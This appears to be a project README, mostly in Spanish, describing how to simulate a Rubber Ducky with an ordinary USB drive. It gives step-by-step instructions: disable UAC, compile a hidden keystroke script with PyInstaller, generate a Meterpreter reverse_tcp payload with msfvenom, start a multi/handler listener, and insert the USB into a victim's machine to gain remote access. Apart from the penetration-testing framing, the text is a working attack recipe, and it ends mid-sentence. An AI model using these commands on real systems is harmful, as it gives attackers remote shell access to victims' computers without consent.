In this project, we simulate a Rubber Ducky using a standard USB drive with a Python script and autorun functionality. This allows us to replicate its keystroke execution capabilities for automated penetration testing. The project emphasizes scripting skills and highlights the security risks of USB devices in cybersecurity.
Primero, descargaremos los archivos del repositorio y los copiaremos en cualquier USB. Luego, editaremos los archivos según nuestras necesidades, ajustando los tiempos que consideremos adecuados para la ejecución de la secuencia de desactivación del archivo teclas.py
.
Es importante tener en cuenta que debemos desactivar el Control de Cuentas de Usuario (UAC) en el sistema Windows de la siguiente manera:
- Abrir el Panel de control.
- Ir a Cuentas de usuario.
- Seleccionar Cambiar configuración de Control de cuentas de usuario.
- Mover el control deslizante a Nunca notificar.
- Hacer clic en Aceptar y reiniciar el sistema si es necesario.
Esta configuración permitirá que el archivo teclas.py
se ejecute sin restricciones de permisos.
Una vez desactivadas las restricciones de UAC y editado el código con los tiempos a nuestra conveniencia, procederemos a convertir el código en un ejecutable utilizando PyInstaller.
Este proyecto incluye el archivo teclas.py
, el cual puedes convertir en un ejecutable (.exe) utilizando PyInstaller
. Sigue los pasos a continuación para realizar la conversión:
-
Asegúrate de tener instalado Python 3 en tu sistema.
-
Instala PyInstaller ejecutando el siguiente comando en tu terminal:
pip install pyinstaller
Instrucciones Descarga o clona este repositorio para obtener el archivo teclas.py.
Abre un terminal en el directorio donde se encuentra el archivo teclas.py. Si estás utilizando Visual Studio Code, puedes abrir el terminal integrado con Ctrl + `.
Ejecuta el siguiente comando para convertir el script en un archivo ejecutable (.exe) y evitar que se abra una consola interactiva:
pyinstaller --onefile --noconsole teclas.py
Resultado Una vez que el comando haya terminado de ejecutarse, encontrarás el archivo ejecutable en la carpeta dist que se crea automáticamente en el directorio del proyecto. El archivo ejecutable estará listo para ejecutarse en sistemas operativos Windows, Procederemos a copiar este ejecutable a nuestra USB de Atacante.
Luego, en nuestra máquina atacante, crearemos el payload con el siguiente comando:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IPAtacante LPORT=PuertoAtacante -f exe -o shell.exe
Una vez generado, copiaremos el payload en la USB
Si deseamos que la USB se ejecute automáticamente en el sistema de la víctima, es necesario que la máquina tenga instalado apo_usb_autorun debido a las restricciones de windows. Si no es así, tendremos que hacer doble clic manualmente en el archivo ejecutable teclas.exe.
Después de esto, nos pondremos en escucha en nuestra IP y puerto asignados en el payload con el siguiente comando:
msfconsole -e use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST IPAtacante
set LPORT PuertoAtacante
run
Finalmente, insertaremos la USB en la máquina de la víctima y esperaremos el acceso remoto.
Recuerda reemplazar IPAtacante
y PuertoAtacante
con los valores correspondientes. También
Author: xrl3y